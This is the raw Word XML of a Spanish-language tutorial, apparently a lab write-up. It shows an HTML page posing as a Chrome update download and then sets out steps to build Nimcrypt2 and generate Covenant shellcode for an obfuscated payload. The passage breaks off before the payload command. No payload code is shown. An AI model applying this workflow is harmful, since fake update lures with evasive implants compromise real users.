        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3677A6A8"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;Estamos emocionados de anunciar que la última versión de Chrome ya está disponible para su descarga. Con una serie de nuevas características emocionantes, esta versión es más rápida y segura que nunca.&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27413DDE"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>href</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"https://www.google.com/chrome/"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"button"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;Descargar ahora&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF4864"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;Gracias por usar Chrome,&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8D687"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lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;El equipo de Google&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180AEDB6"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    &lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764E0B79"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lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>body</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1B0F2E" w14:textId="77777777" w:rsidR="00D67061" w:rsidRPr="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">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D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidRPr="00D67061">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF39559" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C2682A1" w14:textId="489EC322" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y esta visualización:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F96ABD4" w14:textId="77777777" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A875387" w14:textId="02AF669E" w:rsidR="00D67061" w:rsidRDefault="00D67061" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E007F5C" wp14:editId="105B4D31">
            <wp:extent cx="5400040" cy="5260340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="72423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4876" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId299">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="5260340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD9251" w14:textId="77777777" w:rsidR="0028446C" w:rsidRDefault="0028446C" w:rsidP="00D67061">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FF206C" w14:textId="7CE30B15" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearemos el paiload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8BB24C" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C43B6AC" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Voy usar este script de GitHub para ofuscar el código:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC3ACA4" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C2E659" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="00000000" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:hyperlink r:id="rId300" w:history="1">
        <w:r w:rsidR="006428DF" w:rsidRPr="00A55673">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/icyguider/Nimcrypt2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="050BA4D9" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ABFDB5F" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Los pasos para instalarlo son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F8A61" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F7C6DEE" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Primero ejecutamos está domando: “ sudo apt install gcc mingw-64 xz-utils git”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3391E9E6" w14:textId="77777777" w:rsidR="006428DF" w:rsidRPr="00374FC2" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00374FC2">
        <w:t>Ahora ejecutamos este otro, y cuando nos pida responder escribiremos yes:</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00374FC2">
        <w:t xml:space="preserve"> curl https://nim-lang.org/choosenim/init.sh -sSf | sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC6FD5C" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:ind w:left="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00374FC2">
        <w:t>echo "export PATH=$HOME/.nimble/bin:$PATH" &gt;&gt; ~/.bashrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00374FC2">
        <w:t>export PATH=$HOME/.nimble/bin:$PATH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF2A657" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ahora ejecutamos este comando: “ nimble install winim nimcrypto docopt ptr_math strenc “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE40B14" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Y por último nos movemos a la carpeta del programa y lo compilamos con este comando: “ nim c -d=reléase –cc:gcc –embedsrc=on –hints=on –app=console –cpu=amd64 –out=nimcrypt nimcrypt.nim “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4989F64D" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CBAC183" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Una vez realizado estos pasos nuestro programa ya funcionaria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339E9AC1" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A3A19F" w14:textId="77777777" w:rsidR="006428DF" w:rsidRPr="00374FC2" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos a Covenant y generaremos un shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C43DA" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7043DC08" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EE815A" wp14:editId="18991864">
            <wp:extent cx="5400040" cy="4428876"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153768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9070" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301" cstate="screen">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5403002" cy="4431305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D16F0" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C45F516" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D84F97" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F7244C6" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC52F80" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B6D94B1" wp14:editId="55EE0C9C">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="856444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4623" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302"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40BC3DF5" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A1AE9B" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Primero le daremos a Generate y después a Download.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B4388B" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE9E3DF" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora iremos a la carpeta donde este instalado</w:t>
      </w:r>
      <w:r w:rsidRPr="006250C1">
        <w:t xml:space="preserve"> Nimcrypt2</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D79E67" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE4BEB1" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2866B35C" wp14:editId="06FB9F7A">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="352222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2346" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId303"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44746E02" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AD172C" w14:textId="77777777" w:rsidR="006428DF" w:rsidRDefault="006428DF" w:rsidP="006428DF">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora escribiremos el siguiente comando:</w:t>
      </w:r>
    </w:p>
